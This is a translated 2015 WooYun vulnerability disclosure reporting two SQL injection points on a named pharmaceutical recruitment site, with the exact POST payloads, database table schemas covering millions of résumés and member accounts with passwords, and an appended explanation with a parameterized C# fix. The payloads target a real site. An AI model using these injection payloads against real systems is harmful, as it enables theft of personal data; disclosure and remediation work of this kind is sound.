
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0144249

Title: Two vulnerabilities on a pharmaceutical recruitment site together leak 4 million+ résumés (including name / email / mobile number / work address, etc.)

Affected vendor: 猎才医药网

Author: ksss

Submitted: 2015-09-30 15:33

Fixed: 2015-11-14 15:34

Disclosed: 2015-11-14 15:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-30: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-14: The vendor has actively ignored the vulnerability; details are now public

Brief description:

That's over 4 million identity records.

Details:

http://www.jobuy.com/

Screenshot: QQ截图20150930144448.png

The site does not filter its parameters very strictly, which produces two injection points. They expose 4.39 million résumés held by the site, including all kinds of identity details, work history and job preferences, plus 500,000 member accounts that can be used to log in.
Injection point 1
The type parameter. Error reporting is turned up fairly high, so values can be read straight out of the error messages.

http://www.jobuy.com/getjob.ashx
POST:count=14&type=LtaKxrcp' and convert(int,(db_name()))=1 and '1'='1


Screenshot: QQ截图20150930144751.png

This also reveals the site's physical path.
Injection point 2

http://www.jobuy.com/net/company/resumelist.aspx?State=4
POST:
Button_DonwLoad=%e6%89%93%e5%8c%85%e5%af%bc%e5%87%ba%e7%ad%9b%e9%80%89%e7%bb%93%e6%9e%9c&Button_DonwPage=%e5%af%bc%e5%87%ba%e9%80%89%e4%b8%ad%e7%ae%80%e5%8e%86&Button_ToFilter=%e5%bc%80%e5%a7%8b%e7%ad%9b%e9%80%89&CascadingDropDown_City_ClientState=Eu2AfYFp' and 1=(user_name()) and '1'='1&CascadingDropDown_ForWorkPlace_ClientState=&CascadingDropDown_Province_ClientState=&checkall=on&DropDownList_AgeRange=999&DropDownList_City=San%20Francisco&DropDownList_Degree=-1&DropDownList_DeliverDate=9999&DropDownList_Experience=999&DropDownList_Graduating=999&DropDownList_JobList=0&DropDownList_KeyWordType=2&DropDownList_MoveTo=-1&DropDownList_Province=%e5%8c%97%e4%ba%ac&DropDownList_SectionList=0&DropDownList_Sex=999&DropDownList_Star=0&DropDownList_State=-1&DropDownList_WorkPlace=%e5%8c%97%e4%ba%ac&HiddenField_Date=20150928155105&TextBox_KeyWord=1&__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTAyNzE5NzgyNA9kFgICBQ9kFhYCBQ9kFgICAQ8PFgIeBFRleHQFNTxzcGFuIGNsYXNzPSJvcmFuZ2UiPlvor5XnlKjotKblj7ddPC9zcGFuPmFicXZlZXNvLS0xZGQCCQ9kFgJmD2QWAgIBDxBkEBUBBuS4jemZkBUBATAUKwMBZxYBZmQCDQ8QZA8WAmYCARYCEAUG5LiN6ZmQBQEwZxAFCGFicXZlZXNvBQUzOTE3NGcWAWZkAhEPEA8WBh4NRGF0YVRleHRGaWVsZAUIUHJvdmluY2UeDkRhdGFWYWx1ZUZpZWxkBQhQcm92aW5jZR4LXyFEYXRhQm91bmRnZBAVJAbljJfkuqwG5aSp5rSlBuS4iua1twbph43luoYG5rKz5YyXBuWxseilvwblj7Dmub4G6L695a6BBuWQieaelwnpu5HpvpnmsZ8G5rGf6IuPBua1meaxnwblronlvr0G56aP5bu6Buaxn%2bilvwblsbHkuJwG5rKz5Y2XBua5luWMlwbmuZbljZcG5bm/5LicBueUmOiCgwblm5vlt50G6LS15beeBua1t%2bWNlwbkupHljZcG6Z2S5rW3BumZleilvwblub/opb8G6KW/6JePBuWugeWkjwbmlrDnloYJ5YaF6JKZ5Y%2bkBua%2bs%2bmXqAbpppnmuK8G5Zu95aSWBuS4jemZkBUkBuWMl%2bS6rAblpKnmtKUG5LiK5rW3BumHjeW6hgbmsrPljJcG5bGx6KW/BuWPsOa5vgbovr3lroEG5ZCJ5p6XCem7kem%2bmeaxnwbmsZ/oi48G5rWZ5rGfBuWuieW%2bvQbnpo/lu7oG5rGf6KW/BuWxseS4nAbmsrPljZcG5rmW5YyXBua5luWNlwblub/kuJwG55SY6IKDBuWbm%2bW3nQbotLXlt54G5rW35Y2XBuS6keWNlwbpnZLmtbcG6ZmV6KW/BuW5v%2bilvwbopb/ol48G5a6B5aSPBuaWsOeWhgnlhoXokpnlj6QG5r6z6ZeoBummmea4rwblm73lpJYAFCsDJGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ
2dnZ2dnZ2dnZ2dnZ2RkAhUPEA8WBh8BBQhQcm92aW5jZR8CBQhQcm92aW5jZR8DZ2QQFSQG5YyX5LqsBuWkqea0pQbkuIrmtbcG6YeN5bqGBuays%2bWMlwblsbHopb8G5Y%2bw5rm%2bBui%2bveWugQblkInmnpcJ6buR6b6Z5rGfBuaxn%2biLjwbmtZnmsZ8G5a6J5b69Buemj%2bW7ugbmsZ/opb8G5bGx5LicBuays%2bWNlwbmuZbljJcG5rmW5Y2XBuW5v%2bS4nAbnlJjogoMG5Zub5bedBui0teW3ngbmtbfljZcG5LqR5Y2XBumdkua1twbpmZXopb8G5bm/6KW/Builv%2biXjwblroHlpI8G5paw55aGCeWGheiSmeWPpAbmvrPpl6gG6aaZ5rivBuWbveWklgbkuI3pmZAVJAbljJfkuqwG5aSp5rSlBuS4iua1twbph43luoYG5rKz5YyXBuWxseilvwblj7Dmub4G6L695a6BBuWQieaelwnpu5HpvpnmsZ8G5rGf6IuPBua1meaxnwblronlvr0G56aP5bu6Buaxn%2bilvwblsbHkuJwG5rKz5Y2XBua5luWMlwbmuZbljZcG5bm/5LicBueUmOiCgwblm5vlt50G6LS15beeBua1t%2bWNlwbkupHljZcG6Z2S5rW3BumZleilvwblub/opb8G6KW/6JePBuWugeWkjwbmlrDnloYJ5YaF6JKZ5Y%2bkBua%2bs%2bmXqAbpppnmuK8G5Zu95aSWABQrAyRnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIXDxBkEBUBABUBABQrAwFnZGQCKQ8PZBYCHglvbmtleWRvd24FYmlmKGV2ZW50LmtleUNvZGU9PTEzKSB7ZG9jdW1lbnQuYWxsLkJ1dHRvbl9Ub0ZpbHRlci5mb2N1cygpO2RvY3VtZW50LmFsbC5CdXR0b25fVG9GaWx0ZXIuY2xpY2soKTt9ZAIxD2QWAmYPZBYCAgEPFgIeB1Zpc2libGVoZAIzD2QWAmYPZBYCAgMPEGQQFQYY56e75Yqo6YCJ5Lit566A5Y6G5YiwLi4uDOaWsOaUtueugOWOhgzlt7LpmIXnroDljoYP566A5Y6G5pS26JeP5aS5D%2bW3suS4i%2bi9veeugOWOhg/nroDljoblm57mlLbnq5kVBgItMQEwATEBMgE0ATMUKwMGZ2dnZ2dnFgFmZAI3D2QWAmYPZBYCAgkPDxYCHwVoZGQCOw9kFgJmD2QWAgIBDzwrAA0BAA8WBB8DZx4LXyFJdGVtQ291bnRmZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGNoZWNrYWxsBRNHcmlkVmlld19SZXN1bWVMaXN0DzwrAAoCBhUBCVJlY2VpdmVJRAhmZK9xl54cmI4ma4WbUKzsKg94gBSr&__VIEWSTATEGENERATOR=C1E81B99


Screenshot: QQ截图20150930145406.png

The current database holds 4.3 million job-seeker résumés

Screenshot: QQ截图20150930145500.png


Database: jobuy_zhaopin
Table: IJOB_ApplyResume
[25 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| Age | int |
| City | nvarchar |
| ComID | char |
| Degree | int |
| DTime | datetime |
| Email | nvarchar |
| Experience | int |
| Graduating | bit |
| ID | int |
| ip | nvarchar |
| JobID | int |
| lv | int |
| Memo | nvarchar |
| Name | nvarchar |
| Province | nvarchar |
| ResumeID | char |
| SectionID | int |
| Sex | bit |
| Star | int |
| State | int |
| Subject | nvarchar |
| Tel | nvarchar |
| Title | nvarchar |
| WorkPlace | nvarchar |
| ydtime | datetime |
+------------+----------+


Pulling one record: it contains name, email, mobile number, work location, major, and so on

Screenshot: QQ截图20150930150208.png

500,000 member records, including email, QQ number, account password, photo, and so on

Database: jobuy_zhaopin
Table: IJOB_Person
[82 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| Administrator | bit |
| Age | tinyint |
| AvailNotice | nvarchar |
| AvailOpts | tinyint |
| BanCom | nvarchar |
| Birthday | tinyint |
| Birthmonth | tinyint |
| Birthyear | smallint |
| CensusRegisterCity | nvarchar |
| CensusRegisterProvince | char |
| City | nvarchar |
| complete | int |
| Computer | tinyint |
| ComputerLV | nvarchar |
| Degree | tinyint |
| DevelopingDirection | ntext |
| dianaLevel | tinyint |
| Education | ntext |
| Email | nvarchar |
| English | tinyint |
| EnglishLV | nvarchar |
| Experience | tinyint |
| Graduating | bit |
| Height | smallint |
| HitCount | int |
| HomePage | nvarchar |
| ID | int |
| IP | nvarchar |
| IsMobile | bit |
| jingyanshuoming | ntext |
| jinyan | int |
| JobClass | nvarchar |
| JobIntension1 | nvarchar |
| JobIntension2 | nvarchar |
| JobIntension3 | nvarchar |
| l_OneAbility | tinyint |
| l_twoAbility | tinyint |
| language_two | tinyint |
| LastLogin | datetime |
| llcs | int |
| LoginCount | int |
| lxbm | bit |
| mandarinLevel | tinyint |
| MaritalStatus | tinyint |
| mbsys | tinyint |
| Name | char |
| Nationality | char |
| Negotiable | tinyint |
| otherLanguage | varchar |
| PassWord | nvarchar |
| Pay | int |
| Photo | char |
| photopb | tinyint |
| phototre | tinyint |
| ProvideHouseNeeded | tinyint |
| Province | char |
| QQ | varchar |
| RegDate | datetime |
| ResumeID | char |
| ResumeLevel | int |
| rjobid | varchar |
| School | nvarchar |
| Secret | bit |
| SelfAssessment | ntext |
| Sex | bit |
| SiteName | varchar |
| Skill | ntext |
| Subject | nvarchar |
| Tel | nvarchar |
| UpdateDate | datetime |
| UserName | nvarchar |
| workdata | smallint |
| WorkEXPCache | ntext |
| WorkPlace1 | char |
| WorkPlace2 | char |
| WorkPlace3 | char |
| zazhi | bit |
| zhengshu1 | char |
| zhengshu2 | char |
| zhengshu3 | char |
| zhengshu4 | char |
| zhengshutre | tinyint |
+------------------------+----------+


Proof of an administrator account

Screenshot: QQ截图20150930150832.png

Proof of vulnerability:

Screenshot: QQ截图20150930150208.png

Screenshot: QQ截图20150930150832.png

Remediation:

Parameter filtering
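The remediation line above is terse, so here is what "parameter filtering" has to mean for an ASP.NET / SQL Server site like the one in this report. This is an added example, not code from the report or from the site it describes: the table and column names (IJOB_ApplyResume, ID, Name, Email, Tel, City, State) are taken from the sqlmap output in the report, while the class and method names, the connection string and the State range check are assumptions made for the illustration. It shows the string-concatenated query that produces the reported bug class next to the parameterized query that closes it, and a small handler that validates input before anything reaches the database.

```csharp
// Added example, not code from the report or from the site it describes.
// Table/column names (IJOB_ApplyResume, ID, Name, Email, Tel, City, State) come
// from the sqlmap output in the report; the class names, method names, connection
// string and the State range check are assumptions made for this illustration.
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public static class ResumeQueries
{
    // VULNERABLE: the request value is spliced into the SQL text. A value that
    // closes the string literal becomes part of the statement, the server evaluates
    // whatever expression follows, and with detailed errors enabled the conversion
    // error echoes the result back to the client. This is the bug class the report
    // describes for the type and CascadingDropDown_City_ClientState fields.
    public static string BuildVulnerableQuery(string city, int state)
    {
        return "SELECT ID, Name, Email, Tel FROM IJOB_ApplyResume " +
               "WHERE City = '" + city + "' AND State = " + state;
    }

    // HARDENED: the SQL text is a constant and every user-controlled value is bound
    // as a typed parameter. The driver sends values separately from the statement,
    // so quotes and keywords inside them are data, never syntax; the declared type
    // and length also bound what a client can submit.
    public static List<(int Id, string Name, string Email, string Tel)> GetResumesByCity(
        string connectionString, string city, int state)
    {
        const string sql =
            "SELECT ID, Name, Email, Tel FROM IJOB_ApplyResume " +
            "WHERE City = @city AND State = @state";

        var results = new List<(int, string, string, string)>();
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@city", SqlDbType.NVarChar, 50).Value = city ?? string.Empty;
            cmd.Parameters.Add("@state", SqlDbType.Int).Value = state;

            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                {
                    results.Add((
                        reader.GetInt32(0),
                        reader.IsDBNull(1) ? string.Empty : reader.GetString(1),
                        reader.IsDBNull(2) ? string.Empty : reader.GetString(2),
                        reader.IsDBNull(3) ? string.Empty : reader.GetString(3)));
                }
            }
        }
        return results;
    }

    // Validate before querying: State is a small integer code in this application
    // (the report's URL uses State=4), so anything that is not a non-negative
    // integer is rejected up front. The exact allowed range is an assumption.
    public static bool TryParseState(string raw, out int state)
    {
        return int.TryParse(raw, out state) && state >= 0;
    }
}

// A minimal .ashx-style handler wired to the hardened query (hypothetical; the real
// resumelist.aspx page and its field names are not reproduced here). The check that
// the caller is an authenticated company account is omitted for brevity.
public class ResumeListHandler : IHttpHandler
{
    private const string ConnectionString = "<connection string from configuration>"; // placeholder

    public bool IsReusable { get { return false; } }

    public void ProcessRequest(HttpContext context)
    {
        string city = context.Request.Form["City"] ?? string.Empty;
        if (!ResumeQueries.TryParseState(context.Request.QueryString["State"], out int state))
        {
            context.Response.StatusCode = 400;   // bad input never reaches the database
            return;
        }

        var rows = ResumeQueries.GetResumesByCity(ConnectionString, city, state);
        context.Response.ContentType = "text/plain";
        context.Response.Write(rows.Count + " resumes");
    }
}
```

Two points from the report carry over into the fix. First, the error page was doing half the work: it returned the SQL Server conversion error and the site's physical path to the client, so alongside parameterizing the queries the site should stop detailed errors from reaching users (in ASP.NET, `customErrors` in web.config with `mode="On"` does this) and log them server-side instead. Second, the second injection point is in a hidden control-state field (CascadingDropDown_City_ClientState), not a visible text box, so the parameterization has to cover every request field the page binds into SQL, including the ones a browser normally fills in for the user.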

Copyright notice: when reposting, please credit the source: ksss@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused

Vulnerability Rank: 18 (WooYun rating)